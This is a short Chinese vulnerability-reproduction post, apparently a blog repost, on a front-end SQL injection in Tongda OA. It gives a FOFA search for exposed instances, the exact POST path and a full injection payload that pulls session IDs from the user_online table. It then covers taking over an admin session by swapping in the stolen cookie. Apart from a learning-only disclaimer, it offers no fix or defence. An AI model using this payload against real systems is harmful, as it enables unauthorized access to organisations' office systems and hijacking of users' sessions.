通达OA-前台SQL注入
1、前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
2、漏洞复现
(1) 通过FOFA搜索有漏洞的资产
FOFA语法: app=“TDXK-通达OA”
(2) 输入用户名和密码进行BurpSuite抓包
(3) 抓到的数据包发送到重发器
(4) 修改数据包
POST这里:/general/reportshop/utils/get_datas.php
Poayload为:USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1**
(5) 这里要注意如果最后一行出现空行记得删除
(6) 成功获取cookie,多个cookie用分号隔开,我们随便复制一个cookie
(7) 回到浏览器按F12,进行替换
(8) url处拼接general/index.php
(9) 成功进入后台
致谢:
感谢我的好朋友晴的耐心指导
原文:
https://blog.csdn.net/weixin_48539059/article/details/134273012